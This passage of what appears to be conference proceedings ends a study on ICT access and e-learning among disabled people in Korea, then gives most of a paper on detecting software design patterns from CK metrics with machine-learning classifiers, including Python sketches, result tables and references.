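    sxm = sum((xi - mean_x) * (mi - mean_m) for xi, mi in zip(x, m))
    sxy = sum((xi - mean_x) * (yi - mean_y) for xi, yi in zip(x, y))
    smy = sum((mi - mean_m) * (yi - mean_y) for mi, yi in zip(m, y))
    a = sxm / sxx
    b = (sxx * smy - sxm * sxy) / (sxx * smm - sxm ** 2)
    return a, b


def indirect_effect(x, m, y):
    """Indirect effect of x on y through the mediator m (a times b)."""
    a, b = path_coefficients(x, m, y)
    return a * b


def bootstrap_ci(x, m, y, n_boot=500, alpha=0.05, seed=0):
    """Percentile bootstrap confidence interval for the indirect effect."""
    rng = random.Random(seed)
    n = len(x)
    estimates = []
    while len(estimates) < n_boot:
        idx = [rng.randrange(n) for _ in range(n)]
        xs = [x[i] for i in idx]
        if len(set(xs)) < 2:  # skip resamples with no variation in x
            continue
        estimates.append(indirect_effect(xs, [m[i] for i in idx], [y[i] for i in idx]))
    estimates.sort()
    lower = estimates[int((alpha / 2) * n_boot)]
    upper = estimates[int((1 - alpha / 2) * n_boot) - 1]
    return lower, upper


# Synthetic data (hypothetical): x = ICT access (0/1), m = learning aspiration,
# y = a continuous stand-in for e-learning participation.
data_rng = random.Random(42)
n_obs = 400
x = [data_rng.randint(0, 1) for _ in range(n_obs)]
m = [2.0 + 0.8 * xi + data_rng.gauss(0, 0.5) for xi in x]
y = [0.1 * xi + 0.5 * mi + data_rng.gauss(0, 0.5) for xi, mi in zip(x, m)]

estimate = indirect_effect(x, m, y)
lower, upper = bootstrap_ci(x, m, y)
print(f"indirect effect = {estimate:.3f}, 95% CI [{lower:.3f}, {upper:.3f}]")
```

The study reports 3,000 bootstrap samples; the sketch uses 500 only to keep the pure-Python run short. An interval that excludes zero is what supports a mediation effect.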
5 Conclusion
This study examined the effects of ICT access/usage and learning aspiration on the disabled's e-learning participation, using a nationally representative sample of the Korean population. The major findings of this study were as follows. First, the types of disability did not have a significant effect on learning aspirations but significantly affected whether one participated in e-learning. The physical and hearing/language disabled were more likely to participate in e-learning than the non-disabled. These findings suggest that the disabled have as much learning aspiration as the non-disabled and that they have greater demand for e-learning. Second, access to a PC/notebook and internet usage were related to higher learning aspirations. Those who had stronger learning aspirations were more likely to participate in e-learning activities. Therefore, compared with those who cannot access a PC/notebook or use the Internet, access to a PC/notebook and internet usage affect e-learning participation not only directly but also indirectly through learning aspirations. The findings suggest that ICT access and use are not merely tools necessary for e-learning; they also contribute to e-learning by stimulating learning aspirations. However, the disabled showed lower rates of access to desktops/notebooks and of internet use than the non-disabled. Notably, the brain lesion and visual disabled showed the lowest rates due to their handicap in using desktop/notebook devices. Considering that access to a desktop/notebook and internet use are indispensable prerequisites for e-learning participation, the development of desktop/notebook devices satisfying their unique needs may be necessary.
Are CK Metrics Enough to Detect Design Patterns?
Gcinizwe Dlamini, Swati Megha, and Sirojiddin Komolov
Innopolis University, Innopolis, Tatarstan, Russian Federation
[email protected]
Abstract. Design patterns are used to address common design problems in software systems. Several machine learning models have been proposed for detecting and recommending design patterns for a software system. However, limited research has been done on using machine learning models to establish a correlation between design patterns and code quality using CK metrics. In this paper, we first present a manually labelled dataset composed of 590 open-source software projects, primarily from GitHub and GitLab. Secondly, using CK metrics as the input to nine popular machine learning models, we predict design patterns. Lastly, we evaluate the nine machine learning models using four standard metrics, namely Precision, Recall, Accuracy, and F1-Score. Our proposed approach showed noticeable improvement in precision and accuracy.
Keywords: Software design · Machine learning · Code quality · Design patterns
1 Introduction
In the software engineering domain, a design pattern refers to a general solution to a commonly occurring design problem [30]. The use and creation of design patterns became popular after the Gang of Four (GoF) published a book [20] in 1994. The authors proposed 23 design patterns to solve different software design problems. Since then, many new design patterns have emerged to solve several design-related problems. Evidence shows that design patterns solve design issues; however, their usefulness for software products has been a subject of continuous research ever since their inception. In the past decade, many studies have been carried out to investigate the usefulness of design patterns for different aspects of software products and the software development process. Studies have shown that the effect of patterns on software quality is not uniform: the same pattern can have both a positive and a negative effect on the quality of a software product [25]. Also, most of the studies are performed on specific software product cases and fail to present a generalized correlation [50].
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 11–24, 2023. https://doi.org/10.1007/978-3-031-28073-3_2
Currently, software engineers naturally use several design patterns to develop software products. Software systems incorporate several small to large design patterns, aiming to avoid design problems and achieve better software quality. In software development, the code base is modified by programmers in a distributed manner. As the code base grows in size and complexity, identifying the specific design patterns implemented and their impact on software quality becomes a complex task. The complexity of design pattern identification arises for multiple reasons. Firstly, code is often poorly documented. Secondly, programmers implement design patterns according to their own understanding and coding style. Thirdly, a design pattern can be broken or changed during a bug fix or software upgrade; documenting such changes is challenging, which is why software teams refrain from doing so. Lastly, some design patterns are introduced to the code base through third-party libraries and open-source software without any explicit class names, comments, or documentation, making them hard for programmers to understand. Therefore, to better understand the impact of using a specific design pattern on code quality (e.g., in terms of the number of software defects, energy consumption, etc.), it is crucial to first detect the design patterns implemented in the code base independently of documentation. Moreover, design pattern detection contributes to matching patterns with project requirements [16]. To minimize the complexity of manual design pattern identification and of understanding its relation to software quality, systems that can automatically detect and recommend design patterns in a software product should be developed. Numerous studies have been conducted on using static analyzers for design pattern detection; however, static analyzers cannot be considered the optimal solution to the problem because of several drawbacks. Static analyzers use criteria such as class structure for pattern analysis. When class structures are similar across patterns, static analyzers might not identify the patterns correctly.
Also, imposing strict conditions such as class structure can lead to a pattern being missed when it has slight variations [11]. When the measurement matrix grows, static rules for the additional metrics need to be included. Hence, as the matrix grows, the number of rules also increases, and at some point the rule base can become difficult to handle. In recent years, research on using machine learning models for software pattern recommendation and detection has emerged as a reasonable solution to the issue. Hummel and Buger [24] propose a proof-of-concept recommendation system. Another paper proposes the detection of anti-patterns using a machine learning classifier [1]. Yet another model uses graph matching and machine learning techniques for pattern detection. Source code metrics have also been used to detect design patterns [44]. The studies proposing machine learning models for design patterns mostly focus either on detecting patterns in existing code or on recommending patterns based on existing source code. However, limited research has been conducted on using machine learning to establish the correlation between design patterns and software quality, and at present there is a lack of machine learning models that can present a generalized matrix with evidence.
To generalize the correlation between design patterns and software quality, experiments must be conducted on many open-source projects rather than on case studies of an individual software product. At present, we lack quantitative data and evidence on how design patterns can improve software quality. To fill this gap, in this paper we propose a machine learning approach to detect design patterns in open-source projects. We also collect a dataset to be used as a benchmark. The rest of this paper is organized as follows. Section 2 overviews design patterns and machine learning approaches for design pattern detection. Section 3 overviews the methodology of our proposed approach to detecting design patterns. Section 4 presents the obtained results, followed by a discussion in Sect. 5. In Sect. 6, the paper is concluded with future research directions.
2 Background and Related Works
This section presents background on design patterns, their categories, and design pattern detection approaches.
2.1 Design Patterns Background
Design patterns were created to provide proven solutions to recurring design problems in the world of object-oriented systems. The Gang of Four (GoF) proposed 23 different design patterns, organized into three categories: Structural, Creational, and Behavioural. New design patterns started emerging after the GoF patterns became popular. A few years later, in 1996, the authors of [38] formalized and documented software architectural styles. They categorized architectural styles and created variants of those styles through careful discrimination. The purpose of these architectural styles was to guide the design of system structures [38]. Design patterns have evolved over time, and at present many design patterns are available; therefore, organization and classification of design patterns are required for their effective use [21]. In our study, we focus on analyzing the commonly used design patterns from the Gang of Four [20]. The design patterns we focus on are as follows:
– Creational design patterns: The patterns in this category provide ways to instantiate classes and to create objects in complex object-oriented software systems. Examples of creational design patterns are Singleton, Builder, Factory Method, Abstract Factory, Prototype, and Object Pool.
– Structural design patterns: The patterns in this category deal with assembling classes and objects in large and complex systems while keeping them flexible for future updates. Examples of structural design patterns are Adapter, Bridge, Composite, Decorator, Facade, Flyweight, and Proxy.
– Behavioral design patterns: The patterns in this category deal with interaction, communication, and responsibility assignment among objects at execution time. Examples of behavioral design patterns are Iterator, Memento, Observer, and State.
2.2 Design Patterns Detection
Machine Learning Approach: Over the past decades, several research domains have shown evidence of the usefulness of ML models and of their superior performance over existing solutions [10,39,46]. Machine learning (ML) based approaches have also been adopted in the software engineering domain, specifically in the context of design pattern detection. Zanoni et al. [49] proposed a machine learning-based technique to identify five specific design patterns, namely Singleton, Adapter, Composite, Decorator, and Factory Method. The authors implemented a design pattern detection approach using the Metrics and Architecture Reconstruction Plugin for Eclipse (MARPLE). The presented solution works on micro-structures and metrics that have been measured inside the system. The authors further implemented and evaluated different classification techniques for all five design patterns. The highest accuracy across the five patterns varies from 0.81 to 0.93. The proposed approach has four limitations. Firstly, the training sets used in the experiment are based on manual design pattern labeling. Secondly, the labeling is done using a limited number (10) of publicly available software projects. Thirdly, the contents of libraries are not included in them. Lastly, classifier performance is estimated under the assumption that the Joiner has 100% recall. Another study [40] proposed a deep learning-driven approach to detect six design patterns (Singleton, Factory Method, Composite, Decorator, Strategy, and Template Method). For detection, the researchers [40] retrieved the source code as an abstract semantic graph and extracted features to be used as the input to the deep learning model. The procedure extracted micro-structures within the abstract semantic graph. These micro-structures are then used for the candidate sampling process. Candidate mappings fulfill the basic structural properties that a pattern has and hence qualify for detailed analysis via the inference method.
The detection step takes the candidate role mappings and decides whether they are a specific pattern or not. In addition to deep learning methods, the authors used three more machine learning techniques (Nearest Neighbor, Decision Trees, and Support Vector Machines) to detect the design patterns. Nine open-source repositories with design patterns were used as the dataset. The accuracy of the final models for each pattern varies from 0.754 to 0.985. Satoru et al. [45] proposed a design pattern detection technique using source code metrics and machine learning. The approach aims to identify five design patterns (Singleton, Template Method, Adapter, State, and Strategy). The researchers [45] divided the experimental data into small-scale and large-scale code and found a different set of metrics for the two types of data. A neural network was used to classify the design patterns. The F-measure of the proposed technique varies from 0.67 to 0.69 depending on the design pattern, but the solution shows some limitations, as it is unable to distinguish patterns whose class structures are similar. Also, the number of patterns that can be recognized by the proposed technique is limited to five.
Graph Theory Approach: Graph theory is the study of graphs, which are formed by vertices and the edges connecting them [7]. It is one of the fundamental subjects in the field of computer science. Graphs can be used to represent and visualize relationships between components in a problem definition or solution. The concepts of graph theory have successfully been employed in solving complex problems in domains such as linguistics [22], social sciences [5], physics [17], and chemistry [9]. In the same way, software engineers have adopted the principles of graph theory in solving tasks such as design pattern detection (e.g., [4,32,48]). One of the graph theory-based state-of-the-art approaches to detecting design patterns was proposed by Bahareh et al. [4]. Their model is based on semantic graphs and the pattern signatures that characterize each design pattern. The proposed two-phase approach was tested on three open-source benchmark projects: JHotDraw 5.1, JRefactory 2.6.24, and JUnit 3.7. To address the challenges faced by existing pattern detection methodologies, Bahareh et al. [43] proposed a graph-based approach for design pattern detection. The main challenges addressed by their approach are the identification of modified pattern versions and search space explosion for large systems. The approach of Bahareh et al. [43] leverages similarity scoring between graph vertices. The researchers in [32] performed a similar series of experiments using a sub-graph isomorphism approach in the FUJABA [31] environment.
The main goal of the researchers was to address scalability problems that emerge because of variants of design pattern implementations. The proposed approach was validated on only two major Java libraries, which is not enough to establish the effectiveness of the method proposed in [32]. In light of all the aforementioned approaches, there still exists a research gap in terms of the lack of benchmark data for evaluation. Thus, in this paper, we present the first step in benchmark dataset creation and a comparison of machine learning methods evaluated on the dataset.
3 Methodology
Our proposed model pipeline, presented in Fig. 1, contains four main stages:
A. Data Extraction
B. Data Preprocessing
C. ML model definition and training
D. Performance Measuring
The following sections present the details of each stage.
[Figure: pipeline diagram. GitHub and GitLab data → data preprocessing and feature selection → train/test datasets → model training (Random Forest, Neural Network, Logistic Regression, ...) → performance (Precision, Recall, F1 Score, Accuracy).]
Fig. 1. The proposed design patterns detection pipeline.
3.1 Data Extraction
A significant part of the dataset was extracted from two popular version control platforms, namely GitHub (https://github.com) and GitLab (https://gitlab.com). The repositories were manually retrieved by interns in the software engineering laboratory at Innopolis University and manually labeled by the laboratory researchers. The target programming language for the source code in all projects included in the dataset is Java. In addition to these platforms, student projects from Innopolis University were also added to the dataset. The student projects were produced in the scope of an upper-division bachelor course, “System Software Design” (SSD). In this course, the students were taught different design patterns and were required to design and implement a system applying at least one GoF design pattern as part of the course evaluation. For each project's source code, the metrics proposed by Chidamber and Kemerer [12], now referred to as the CK metrics, were extracted and served as input data for the machine learning models. An open-source tool [3] was used to extract the CK metrics.
3.2 Data Preprocessing
Data preprocessing is an essential part of curating the data for further processing. All the CK metrics are numerical. The numerical attributes are normalized to zero mean and unit variance. This normalization standardizes the input vectors and helps the machine learning models in the learning process. Moreover, the means and standard deviations are stored so that the input data can be transformed in the same way during the testing phase. Transforming and re-scaling the input data is important for the performance of models such as neural networks and distance-based models (e.g., k-nearest neighbors, SVM) [19]. To improve the performance of the machine learning models, the original dataset was balanced using the Adaptive Synthetic (ADASYN) oversampling algorithm [23].
3.3 Machine Learning Models
To detect the type of design pattern, we employ machine learning and deep learning methods. For the deep learning approach we use a simple ANN, and for traditional ML we use models from different classifier families. The models used in this paper, along with the families they belong to, are as follows:
– Tree Methods: Decision tree (DT) [36]
– Ensemble Methods: Random Forest [8]
– Gradient Boosting: Catboost [14]
– Generalized Additive Model: Explainable Boosting Machine [28]
– Probabilistic Methods: Naive Bayes [41]
– Deep Learning: Artificial neural network [42]
– Linear models: Logistic Regression [26]
– Other: K-NN [18] & Support vector machine (SVM) [37]
The sklearn Python library (version 0.21.2) implementation is used for the chosen ML models [34]. To set a benchmark performance for the classifiers, we used the default training parameters set by sklearn. The Python library interpretml [33] is used for the explainable gradient boosting classifier implementation.
3.4 Performance Metrics
Five standard performance metrics are used in this paper, namely Precision, Recall, F1-score, weighted F1-score, and Accuracy. They are calculated from the values of a confusion matrix as follows:

$$\mathrm{Precision} = \frac{TP}{TP + FP} \tag{1}$$

$$\mathrm{Recall} = \frac{TP}{TP + FN} \tag{2}$$

$$F1\text{-}score = 2 \cdot \frac{\mathrm{Precision} \cdot \mathrm{Recall}}{\mathrm{Precision} + \mathrm{Recall}} \tag{3}$$

$$\mathrm{Weighted}\ F1\text{-}score = \frac{\sum_{i=1}^{K} \mathrm{Support}_i \cdot F1_i}{\mathrm{Total}} \tag{4}$$

$$\mathrm{Accuracy} = \frac{TP + TN}{TP + TN + FP + FN} \tag{5}$$

where TN is the number of true negatives, TP is the number of true positives, FP is the number of false positives, FN is the number of false negatives, Support_i is the number of samples with a given label i, and F1_i is the F1 score of a given label i.
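Equations (1) to (5) translate directly into code. The following is a minimal sketch rather than the evaluation code used in the paper: the function names and the confusion-matrix counts are hypothetical, K is taken to be the number of labels and Total the total number of samples, and only the test-set supports (38, 38, 42) come from Table 1.

```python
def precision(tp, fp):
    """Eq. (1): share of predicted positives that are correct."""
    return tp / (tp + fp) if (tp + fp) else 0.0


def recall(tp, fn):
    """Eq. (2): share of actual positives that are found."""
    return tp / (tp + fn) if (tp + fn) else 0.0


def f1_score(p, r):
    """Eq. (3): harmonic mean of precision and recall."""
    return 2 * p * r / (p + r) if (p + r) else 0.0


def weighted_f1(f1_by_label, support_by_label):
    """Eq. (4): per-label F1 averaged with label supports as weights."""
    total = sum(support_by_label.values())
    return sum(support_by_label[label] * f1_by_label[label]
               for label in f1_by_label) / total


def accuracy(tp, tn, fp, fn):
    """Eq. (5): share of all predictions that are correct."""
    return (tp + tn) / (tp + tn + fp + fn)


# Hypothetical confusion-matrix counts for one binary detection task.
tp, fp, fn, tn = 30, 10, 8, 70
p = precision(tp, fp)
r = recall(tp, fn)
f1 = f1_score(p, r)
acc = accuracy(tp, tn, fp, fn)

# Supports are the test-set class sizes from Table 1; the F1 values are made up.
supports = {"Creational": 38, "Structural": 38, "Behavioural": 42}
f1_values = {"Creational": 0.8, "Structural": 0.6, "Behavioural": 0.7}
w_f1 = weighted_f1(f1_values, supports)

print(f"precision={p:.2f} recall={r:.2f} f1={f1:.2f} accuracy={acc:.2f} weighted_f1={w_f1:.2f}")
```

The zero-denominator guards are a design choice of this sketch; libraries differ in how they treat a class with no predicted or no actual positives.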
4 Implementation Details and Results
4.1 Dataset Description
After retrieving the data from GitHub, GitLab, and students projects, we compiled the dataset. The summary of the compiled dataset is presented in Table 1. We then split the full dataset into train and test sets.

Table 1. Train and test data distribution

| Class | Training set | Percentage | Test set | Percentage |
|---|---|---|---|---|
| Creational | 282 | 59.7% | 38 | 32.2% |
| Structural | 86 | 18.2% | 38 | 32.2% |
| Behavioural | 104 | 22.1% | 42 | 35.5% |
| Total | 472 | 100% | 118 | 100% |

4.2 Experiments
The experiments were carried out on an Intel Core i5 CPU with 8 GB RAM. A Python library called sklearn (version 0.24.1) [34] was used for training and testing the models. Furthermore, we used the default training parameters set by the sklearn Python library for all the machine learning models. The results obtained are summarized in Table 2 for creational design patterns, Table 3 for structural design patterns, and Table 4 for behavioral patterns. In each experiment, the ML models were trained with data balanced using ADASYN.
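The preprocessing and training steps used in these experiments can be sketched end to end in plain Python. This is an illustrative sketch under stated assumptions, not the authors' code: the feature rows are made-up stand-ins for CK metric vectors, the per-category labels are assumed to be formed in a one-vs-rest manner, random duplication of minority rows is swapped in for ADASYN (which synthesizes new points instead), and a small from-scratch k-NN stands in for the sklearn classifier. All function names are hypothetical.

```python
import math
import random
import statistics
from collections import Counter


def fit_scaler(rows):
    """Per-feature mean and standard deviation, computed on the training set only."""
    columns = list(zip(*rows))
    means = [statistics.fmean(col) for col in columns]
    stds = [statistics.pstdev(col) or 1.0 for col in columns]  # guard constant features
    return means, stds


def transform(rows, means, stds):
    """Standardize rows with previously stored means and standard deviations."""
    return [[(v - mu) / sd for v, mu, sd in zip(row, means, stds)] for row in rows]


def one_vs_rest(labels, positive):
    """Relabel a multi-class target as 1 (positive class) or 0 (all others)."""
    return [1 if label == positive else 0 for label in labels]


def random_oversample(rows, labels, seed=0):
    """Duplicate minority-class rows until all classes have equal size.
    Simple stand-in for ADASYN, not an implementation of it."""
    rng = random.Random(seed)
    counts = Counter(labels)
    target = max(counts.values())
    out_rows, out_labels = list(rows), list(labels)
    for label, count in counts.items():
        pool = [row for row, lab in zip(rows, labels) if lab == label]
        for _ in range(target - count):
            out_rows.append(rng.choice(pool))
            out_labels.append(label)
    return out_rows, out_labels


def knn_predict(train_rows, train_labels, row, k=5):
    """Majority vote among the k nearest training rows (Euclidean distance)."""
    nearest = sorted(zip(train_rows, train_labels),
                     key=lambda pair: math.dist(pair[0], row))[:k]
    return Counter(label for _, label in nearest).most_common(1)[0][0]


# Made-up feature rows standing in for CK metric vectors.
train_X = [[12, 3, 1], [15, 4, 1], [11, 2, 2], [14, 3, 1], [40, 9, 3], [38, 11, 4]]
train_y = ["creational"] * 4 + ["structural"] * 2
test_X = [[13, 3, 1], [39, 10, 3]]

means, stds = fit_scaler(train_X)          # statistics stored from training data
X_train = transform(train_X, means, stds)
X_test = transform(test_X, means, stds)    # same statistics reused at test time

y_binary = one_vs_rest(train_y, "creational")
X_bal, y_bal = random_oversample(X_train, y_binary)

predictions = [knn_predict(X_bal, y_bal, row, k=3) for row in X_test]
print(predictions)
```

Only the training split is oversampled, and the test rows are scaled with the stored training statistics, so no information from the test set leaks into training.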
Table 2. Detection of creational patterns

| Classifiers | Precision | Recall | Accuracy | F1-score |
|---|---|---|---|---|
| LR | 0.76 | 0.71 | 0.71 | 0.72 |
| Naive Bayes | 0.73 | 0.69 | 0.69 | 0.70 |
| SVM | 0.80 | 0.77 | 0.77 | 0.78 |
| Decision Tree | 0.72 | 0.64 | 0.64 | 0.66 |
| Random Forest | 0.75 | 0.68 | 0.68 | 0.69 |
| Neural Networks | 0.76 | 0.76 | 0.76 | 0.76 |
| k-NN | 0.82 | 0.80 | 0.80 | 0.80 |
| Catboost | 0.75 | 0.66 | 0.66 | 0.67 |
| Explainable Boosting Classifier | 0.76 | 0.66 | 0.66 | 0.67 |
Table 3. Detection of structural patterns

| Classifiers | Precision | Recall | Accuracy | F1-score |
|---|---|---|---|---|
| LR | 0.62 | 0.55 | 0.55 | 0.57 |
| Naive Bayes | 0.74 | 0.61 | 0.61 | 0.62 |
| SVM | 0.60 | 0.56 | 0.56 | 0.57 |
| Decision Tree | 0.56 | 0.57 | 0.57 | 0.57 |
| Random Forest | 0.54 | 0.62 | 0.62 | 0.56 |
| Neural Networks | 0.63 | 0.61 | 0.61 | 0.62 |
| k-NN | 0.56 | 0.52 | 0.52 | 0.53 |
| Catboost | 0.54 | 0.58 | 0.58 | 0.56 |
| Explainable Boosting Classifier | 0.67 | 0.68 | 0.68 | 0.67 |
Table 4. Detection of behavioral patterns

| Classifiers | Precision | Recall | Accuracy | F1-score |
|---|---|---|---|---|
| LR | 0.66 | 0.65 | 0.65 | 0.66 |
| Naive Bayes | 0.69 | 0.65 | 0.65 | 0.66 |
| SVM | 0.68 | 0.68 | 0.68 | 0.68 |
| Decision Tree | 0.61 | 0.63 | 0.63 | 0.62 |
| Random Forest | 0.67 | 0.68 | 0.68 | 0.67 |
| Neural Networks | 0.67 | 0.69 | 0.69 | 0.67 |
| k-NN | 0.70 | 0.64 | 0.64 | 0.65 |
| Catboost | 0.64 | 0.66 | 0.66 | 0.64 |
| Explainable Boosting Classifier | 0.60 | 0.64 | 0.64 | 0.60 |
Table 5. Multi-class classification accuracy

| Classifier | SMOTEENN | SMOTE | BorderlineSMOTE | ADASYN | Original | SVMSMOTE |
|---|---|---|---|---|---|---|
| LR | 0.53 | 0.51 | 0.52 | 0.52 | 0.39 | 0.47 |
| Decision Tree | 0.49 | 0.39 | 0.44 | 0.52 | 0.47 | 0.37 |
| EBM | 0.54 | 0.53 | 0.52 | 0.50 | 0.38 | 0.52 |
| Random Forest | 0.53 | 0.46 | 0.53 | 0.52 | 0.44 | 0.47 |
| Catboost | 0.48 | 0.45 | 0.48 | 0.43 | 0.40 | 0.42 |
| Neural Network | 0.35 | 0.41 | 0.44 | 0.42 | 0.52 | 0.39 |
| k-NN | 0.53 | 0.54 | 0.54 | 0.54 | 0.52 | 0.56 |
| SVM | 0.53 | 0.53 | 0.51 | 0.53 | 0.34 | 0.48 |
| Naive Bayes | 0.53 | 0.54 | 0.58 | 0.55 | 0.50 | 0.48 |
5 Discussion
This section discusses the results reported in Sect. 4, the limitations of our approach, and the threats to its validity. For creational design patterns, under the One-vs-Rest setting, all the methods achieve good performance, with k-NN performing best on all selected evaluation metrics. Depending on the objective of the detection, an explainable boosting classifier is the better choice when a deeper understanding of why a piece of source code was classified as creational is needed. In some cases, design patterns are implemented with modifications. Depending on the available computational budget, other approaches can be selected (e.g. Naive Bayes is computationally cheaper than neural networks and SVM). The algorithms performed worse on structural and behavioral design patterns than on creational design patterns. While the Explainable Boosting Classifier outperformed the other methods on the structural patterns, the algorithms performed roughly equally on the behavioral design patterns, except for Catboost and the Explainable Boosting Classifier. We can only highlight SVM and neural networks, which showed slightly better results. This tendency can be explained by data imbalance and by the relatively smaller number of samples for structural and behavioral patterns. Although this tendency might seem a limitation of the current paper, it also suggests that the chosen method works, since the results improve on the bigger dataset (i.e. creational design patterns). Overall, the results show that more resources are required on small datasets, since SVM and neural networks are computationally demanding. One might argue that machine learning and deep learning-based approaches are black boxes and may not help in understanding what leads to the detection of specific design patterns, in comparison to graph-based approaches. 
However, researchers over the years have proposed a new research direction named interpretable/explainable machine learning. As a result, methods such as LIME [35], InterpretML [33] and SHAP [29] have been developed. In our experiment, we have employed an explainable boosting classifier (EBM) as a step towards explainable design pattern detection methods. The use of models such as EBM can help in the identification of semantic relationships among design patterns. As Tables 1 and 5 show, the main disadvantage of our preliminary dataset is that it is imbalanced. To minimize the impact of the dataset on the machine learning models, we have balanced the data using ADASYN, which is one of the popular approaches for balancing datasets in the machine learning domain. The results of multi-class classification using balanced data, and a comparison with other data balancing techniques, are presented in Table 5. We aim to enlarge the dataset in the future by collecting and labeling more Java projects from GitHub as well as from Innopolis University. We are also considering other techniques to enlarge the dataset, such as statistical and deep learning-based approaches [13,15,27,47,51].
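To make the balancing step more concrete, the following is a simplified two-class sketch of the ADASYN idea: minority samples that have more majority-class neighbours receive more synthetic samples, and each synthetic sample is interpolated between a minority sample and one of its minority neighbours. It is written in plain Python for illustration and is not the implementation used in the experiments; the function names, the Euclidean distance, the parameter defaults and the toy points are all assumptions.

```python
import math
import random


def _nearest(idx, points, k):
    """Indices of the k points closest to points[idx], excluding idx itself."""
    others = [j for j in range(len(points)) if j != idx]
    others.sort(key=lambda j: math.dist(points[idx], points[j]))
    return others[:k]


def adasyn(minority, majority, k=3, beta=1.0, seed=0):
    """Simplified two-class ADASYN sketch; needs at least two minority points."""
    rng = random.Random(seed)
    everyone = list(minority) + list(majority)  # minority points come first
    n_min = len(minority)
    target = int((len(majority) - n_min) * beta)  # synthetic samples wanted

    # r_i: share of majority points among the k nearest neighbours of point i
    ratios = [sum(1 for j in _nearest(i, everyone, k) if j >= n_min) / k
              for i in range(n_min)]
    total = sum(ratios)
    weights = [r / total for r in ratios] if total > 0 else [1 / n_min] * n_min

    synthetic = []
    for i, w in enumerate(weights):
        neighbours = _nearest(i, minority, k)  # minority neighbours only
        # Rounding means the final count can differ slightly from `target`.
        for _ in range(round(w * target)):
            z = minority[rng.choice(neighbours)]
            lam = rng.random()
            synthetic.append(tuple(a + lam * (b - a)
                                   for a, b in zip(minority[i], z)))
    return synthetic


# Hypothetical 2-D feature vectors, for illustration only.
minority = [(0.0, 0.0), (1.0, 0.0), (0.0, 1.0), (3.0, 3.0)]
majority = [(3.0, 4.0), (4.0, 3.0), (4.0, 4.0), (5.0, 5.0),
            (3.5, 3.5), (6.0, 6.0), (5.0, 4.0), (4.0, 5.0)]
synthetic = adasyn(minority, majority)
```

In this toy example only the minority point (3.0, 3.0) lies close to the majority class, so all synthetic samples are generated from it.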
6 Conclusion
Drawing a relationship between software quality and design patterns is a complex task. In this paper, we present the first step towards the analysis of the impact of design patterns on software quality. Firstly, we propose a machine learning-based approach for detecting design patterns from source code using CK metrics, and validate its performance using precision, recall, accuracy and F1-score. Secondly, we compiled a dataset that can serve as a benchmarking dataset for design pattern detection approaches. The dataset was compiled from openly available GitLab and GitHub repositories and from Innopolis University 3rd-year students' projects. Overall, the dataset has 590 records which can be used to train and test machine learning models. The achieved results suggest that, using CK metrics as input to machine learning models, design patterns can be detected from source code. For future work, we plan to use code embeddings [2] and granular computing techniques such as fuzzy c-means [6], since real-life projects often implement more than a single design pattern. We also plan to increase the size of the dataset by collecting more data and by using statistical and deep learning approaches [13,27].
References
1. Akhter, N., Rahman, S., Taher, K.A.: An anti-pattern detection technique using machine learning to improve code quality. In: 2021 International Conference on Information and Communication Technology for Sustainable Development (ICICT4SD), pp. 356–360 (2021)
2. Alon, U., Zilberstein, M., Levy, O., Yahav, E.: code2vec: learning distributed representations of code. In: Proceedings of the ACM on Programming Languages, vol. 3, no. POPL, pp. 1–29 (2019)
3. Aniche, M.: Java code metrics calculator (CK) (2015). https://github.com/mauricioaniche/ck/
4. Mayvan, B.B., Rasoolzadegan, A.: Design pattern detection based on the graph theory. Knowl.-Based Syst. 120, 211–225 (2017)
5. Barnes, J.A.: Graph theory and social networks: a technical comment on connectedness and connectivity. Sociology 3(2), 215–232 (1969)
6. Bezdek, J.C., Ehrlich, R., Full, W.: FCM: the fuzzy c-means clustering algorithm. Comput. Geosci. 10(2–3), 191–203 (1984)
7. Bollobás, B.: Modern Graph Theory, vol. 184. Springer, Heidelberg (2013)
8. Breiman, L.: Random forests. Mach. Learn. 45(1), 5–32 (2001)
9. Burch, K.J.: Chemical applications of graph theory. In: Blinder, S.M., House, J.E. (eds.) Mathematical Physics in Theoretical Chemistry, Developments in Physical and Theoretical Chemistry, pp. 261–294. Elsevier (2019)
10. Carbonneau, R., Laframboise, K., Vahidov, R.: Application of machine learning techniques for supply chain demand forecasting. Eur. J. Oper. Res. 184(3), 1140–1154 (2008)
11. Chaturvedi, S., Chaturvedi, A., Tiwari, A., Agarwal, S.: Design pattern detection using machine learning techniques. In: 2018 7th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions) (ICRITO), pp. 1–6. IEEE (2018)
12. Chidamber, S.R., Kemerer, C.F.: A metrics suite for object oriented design. IEEE Trans. Softw. Eng. 20(6), 476–493 (1994)
13. Dlamini, G., Fahim, M.: Dgm: a data generative model to improve minority class presence in anomaly detection domain. Neural Comput. Appl. 33, 1–12 (2021)
14. Dorogush, A.V., Ershov, V., Gulin, A.: Catboost: gradient boosting with categorical features support. arXiv preprint arXiv:1810.11363 (2018)
15. Douzas, G., Bacao, F.: Effective data generation for imbalanced learning using conditional generative adversarial networks. Expert Syst. Appl. 91, 464–471 (2018)
16. Eckert, K., Fay, A., Hadlich, T., Diedrich, C., Frank, T., Vogel-Heuser, B.: Design patterns for distributed automation systems with consideration of non-functional requirements. In: Proceedings of 2012 IEEE 17th International Conference on Emerging Technologies & Factory Automation (ETFA 2012), pp. 1–9. IEEE (2012)
17. Essam, J.W.: Graph theory and statistical physics. Disc. Math. 1(1), 83–112 (1971)
18. Fix, E., Hodges, J.L.: Discriminatory analysis. nonparametric discrimination: consistency properties. Int. Stat. Rev./Revue Internationale de Statistique 57(3), 238–247 (1989)
19. Friedman, J.H.: The Elements of Statistical Learning: Data Mining, Inference, and Prediction. Springer, Heidelberg (2017)
20. Gamma, E.: Design Patterns: Elements of Reusable Object-Oriented Software. Pearson Education India (1995)
21. Gamma, E., Helm, R., Johnson, R., Vlissides, J.: Design patterns: abstraction and reuse of object-oriented design. In: Nierstrasz, O.M. (ed.) ECOOP 1993. LNCS, vol. 707, pp. 406–431. Springer, Heidelberg (1993). https://doi.org/10.1007/3-540-47910-4_21
22. Hale, S.A.: Multilinguals and wikipedia editing. In: Proceedings of the 2014 ACM Conference on Web Science, WebSci 2014, New York, NY, USA, pp. 99–108. Association for Computing Machinery (2014)
23. He, H., Bai, Y., Garcia, E.A., Li, S.: Adasyn: adaptive synthetic sampling approach for imbalanced learning. In: 2008 IEEE International Joint Conference on Neural Networks (IEEE World Congress on Computational Intelligence), pp. 1322–1328. IEEE (2008)
